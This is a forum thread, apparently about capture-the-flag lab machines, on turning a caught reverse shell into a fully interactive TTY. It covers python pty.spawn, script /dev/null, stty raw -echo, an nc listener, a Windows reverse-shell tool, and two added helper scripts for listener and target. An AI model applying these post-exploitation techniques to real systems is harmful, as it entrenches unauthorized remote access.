Obtaining a Fully Interactive Shell

For the sake of variety: instead of doing the python -c ... thing, and thus relying on python being available on the box, you could also do:

script /dev/null. This will give you a pty (as tty will tell you), so su and passwd should work. I usually do a bash -i first. Do note that the environment will still need some fixing up (CTRL+z ... etc., and export TERM=linux, export HOME=/tmp or something similar).

HTH!

@KeyboardCaper said:

After getting a terminal:

python -c 'import pty; pty.spawn("/bin/bash")'
CTRL-z
bg
stty raw -echo
fg
reset
(In case of unknown terminal type try: linux)

Optional:
export SHELL=/bin/bash
export TERM=xterm-color
export HOME=

Then fix up the rows and columns. Open another terminal
stty -a

Get the rows and columns.

Back on your reverse shell:
stty rows <> columns <>

Rarely does the python part not work... when it doesn't, I simply find a workaround or just deal with what I have.
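The routine above, gathered into an attacker-side helper. This is an added example, not code from the post: it prints the exact line to paste into the remote shell once you are back in it after stty raw -echo; fg, then runs the listener with the local terminal settings saved beforehand (stty -g) and restored on exit, so the local terminal is usable again when the remote shell dies. The listener port (4444), the nc flags (-lvnp) and the TERM fallback (xterm-256color) are assumptions, not from the thread.

```shell
#!/bin/sh
# Added example (not from the original posts): attacker-side helper for the
# "upgrade to a full TTY" routine.
#   sh upgrade_helper.sh --run [port]     # port defaults to 4444 (assumed)
#
# 1. prints the stty/export line to paste into the remote shell after
#    `stty raw -echo; fg`, sized from the local terminal;
# 2. runs the nc listener with local tty settings saved and restored on exit.

# Build the fix-up line for the remote side from a size and TERM value.
# Pure function (arguments in, string out) so it can be checked without a tty.
remote_fixup_line() {
    rows="$1"; cols="$2"; term="${3:-xterm-256color}"
    printf 'stty rows %s columns %s; export TERM=%s SHELL=/bin/bash\n' \
        "$rows" "$cols" "$term"
}

# Read the local terminal size as "ROWS COLS"; fall back to 24 80 when no
# tty is attached (stty then fails with "Inappropriate ioctl for device").
local_size() {
    size=$(stty size 2>/dev/null) && [ -n "$size" ] \
        && printf '%s\n' "$size" || printf '24 80\n'
}

# Restore the settings saved by run_listener (no-op if nothing was saved).
restore_tty() {
    [ -n "${SAVED_TTY:-}" ] && stty "$SAVED_TTY"
}

# Save local tty settings, run the listener, restore settings afterwards,
# whether nc exits normally or is interrupted.  Without this, a remote shell
# that exits while the local tty is in `raw -echo` leaves you with a
# terminal that shows nothing you type until you blindly run `reset`.
run_listener() {
    SAVED_TTY=$(stty -g 2>/dev/null || true)
    trap restore_tty EXIT INT TERM
    nc -lvnp "${1:-4444}"
}

main() {
    set -- "${1:-4444}" $(local_size)    # $1=port $2=rows $3=cols
    echo "# after 'stty raw -echo; fg', paste this into the remote shell:"
    remote_fixup_line "$2" "$3" "${TERM:-xterm-256color}"
    run_listener "$1"
}

if [ "${1:-}" = "--run" ]; then main "${2:-4444}"; fi
```

On the target you still do the python/script pty spawn, CTRL-z, stty raw -echo; fg in the local terminal, then paste the printed line; the restore on exit is what lets you simply type exit in the remote shell afterwards.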

Probably good to note for this that python -c 'import pty;pty.spawn("/bin/bash")' won’t work with any versions of Python3, so specifying python3 -c ... is necessary. Otherwise solid description, you nailed it to a “T”.

I have a curious problem with this kind of shell. I'm working with the Kali KDE distribution with the standard Konsole terminal and /bin/bash.

I start a reverse shell from another machine.

On my attacking machine I have netcat listening:
nc -l -v -p 80

I get the connection on my host:
listening on [any] 80 …
connect to [10.10.14.2] from craft.htb [10.10.10.110] 40575
/bin/sh: can't access tty; job control turned off
/opt/app #

I do my routine to elevate the shell:
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL-z
stty raw -echo
fg
reset

I have a fully functional shell BUT I can’t close it. I’ll always have to kill the process. I use exit to leave the shell and end up in a window where I can’t enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

Any Ideas what could go wrong here?

On a side note, what if I don't have a /bin/bash on the remote machine? Is it possible to get a fully interactive shell?

@timebeyond said:
I have a fully functional shell BUT I can’t close it. I’ll always have to kill the process. I use exit to leave the shell and end up in a window where I can’t enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

I actually had this exact same issue when I was working on networked. I had to kill the process, but I am not sure what went wrong.

On a side note, what if I don't have a /bin/bash on the remote machine? Is it possible to get a fully interactive shell?

You can use /bin/sh, which is most of the time just a symbolic link to the real active shell.

Thanks for the reassurance that my standard setup has no flaws. Just wanted to be sure that the problem isn’t between the keyboard and the chair.

If you are looking for a way to get a fully interactive shell on Windows, I just released a C#/PowerShell reverse shell that implements the pty console. Here's the link → GitHub - antonioCoco/ConPtyShell: ConPtyShell - Fully Interactive Reverse Shell for Windows

@splintercode said:
If you are looking for a way to get a fully interactive shell on Windows, I just released a C#/PowerShell reverse shell that implements the pty console. Here's the link → GitHub - antonioCoco/ConPtyShell: ConPtyShell - Fully Interactive Reverse Shell for Windows

This is absolutely glorious! Just tried it, and suddenly my smb-recon-using-linux-tools PTSD is cured by the healing light of PS in a PTY :)

@splintercode it appears to have some issues deciding which process listens to the input pipe, though. I run the shell from a small PS stager that IEXs the Invoke-Con*-definition along with an invocation in the same command, and often I get at least two powershell.exe's spinning up a process each for every one I try to start :)

@scud78 I don't understand the bugged scenario. If you can open an issue on GitHub (Issues · antonioCoco/ConPtyShell · GitHub), I could troubleshoot the scenario and work on a fix.

@splintercode said:
@scud78 I don't understand the bugged scenario. If you can open an issue on GitHub (Issues · antonioCoco/ConPtyShell · GitHub), I could troubleshoot the scenario and work on a fix.

Turns out it was the combination of three (or possibly four) nested powershell processes (including yours) with DUPd stdhandles. Not much you can do about that, really :wink:

Hey, my terminal lags like crazy when I'm upgrading my shell to a fully interactive one with python -c 'import ... It happens after I type in stty raw -echo and foreground the nc session. Does anybody have a similar issue?

Indeed a fun box. A little observation, OSINT and boom. The rest is pretty simple.

PM me if you need any help.

@MrSHolmes said:

Indeed a fun box. A little observation, OSINT and boom. The rest is pretty simple.

Did you post this on the wrong thread?

Can anyone tell me why the tty is suddenly really slow after upgrading with this method?

Personally, I find these methods to always be a bit janky and complicated. I usually immediately go for a socat reverse shell to get a proper tty, or get a normal shell first only to set the socat shell up. It just feels a lot more stable and doesn't have as much unexpected behaviour, in my opinion. Also it just feels easier ¯\_(ツ)_/¯

I saw on another thread where @MinatoTW recommended doing /usr/bin/script -qc /bin/bash /dev/null.

I tried it and it worked like a charm. No long python commands, no throwing the shell into the background and messing with stty.
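The fallbacks scattered through this thread (python3 where plain python is missing, script -qc ... /dev/null where there is no Python at all, and /bin/sh when the box has no /bin/bash) collected into one target-side script. This is an added example, not code from any of the posts. The selection logic takes the list of available commands as an argument so it can be checked offline; upgrade_here probes the real box with command -v and -x. It assumes a Linux target with util-linux script (BSD script has a different -c handling) and the paths /bin/bash and /bin/sh.

```shell
#!/bin/sh
# Added example (not from the original posts): pick a way to get a pty on the
# target from what is actually installed.  Paste the functions into the dumb
# reverse shell and call upgrade_here, or run:  sh pty.sh --run

# Choose the shell to spawn: /bin/bash if present, otherwise /bin/sh, which is
# usually a symlink to whatever the real system shell is.
# $1: space-separated list of shell paths that exist on the box
pick_shell() {
    case " $1 " in
        *" /bin/bash "*) printf '/bin/bash\n' ;;
        *)               printf '/bin/sh\n' ;;
    esac
}

# Build the command that allocates a pty around the chosen shell.
# $1: space-separated list of command names found on the box
# $2: shell to spawn
# Preference: python3, then python, then util-linux script; empty if none.
pty_spawn_cmd() {
    avail=" $1 "; shell="$2"
    case "$avail" in
        *" python3 "*) printf "python3 -c 'import pty; pty.spawn(\"%s\")'\n" "$shell" ;;
        *" python "*)  printf "python -c 'import pty; pty.spawn(\"%s\")'\n" "$shell" ;;
        *" script "*)  printf 'script -qc %s /dev/null\n' "$shell" ;;
        *)             printf '\n' ;;
    esac
}

# Probe the real box: which pty helpers are in PATH.
probe_available() {
    found=""
    for c in python3 python script; do
        command -v "$c" >/dev/null 2>&1 && found="$found $c"
    done
    printf '%s\n' "${found# }"
}

# Probe the real box: which candidate shells are executable.
probe_shells() {
    found=""
    for s in /bin/bash /bin/sh; do
        [ -x "$s" ] && found="$found $s"
    done
    printf '%s\n' "${found# }"
}

# Run on the target: spawn a pty with the best available method, or say why not.
upgrade_here() {
    shell=$(pick_shell "$(probe_shells)")
    cmd=$(pty_spawn_cmd "$(probe_available)" "$shell")
    if [ -z "$cmd" ]; then
        echo "no python/script on this box; staying in the dumb $shell" >&2
        return 1
    fi
    echo "+ $cmd" >&2
    eval "$cmd"
}

if [ "${1:-}" = "--run" ]; then upgrade_here; fi
```

Whatever command it picks, the local side is the same as in the posts above: CTRL-z, stty raw -echo; fg, then reset or set rows/columns by hand.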

Saved me from going nuts. Windows guys struggle with shells, and zsh on the new Kali took me out of my comfort zone post-exploit. Just chain the command:
"stty raw -echo; fg"

Hi guys, have a look at this tool.

You automatically get a TTY shell and much more.

@hkh4cks said:

I've tried the above method a few times, but it failed every time. I don't understand what I am doing wrong...
After doing fg, the Enter key is displayed as ^M.
Something like this:

$ fg
                           clear^M

Before you start netcat, change the shell to bash by typing bash, then try again. ZSH sucks, mate...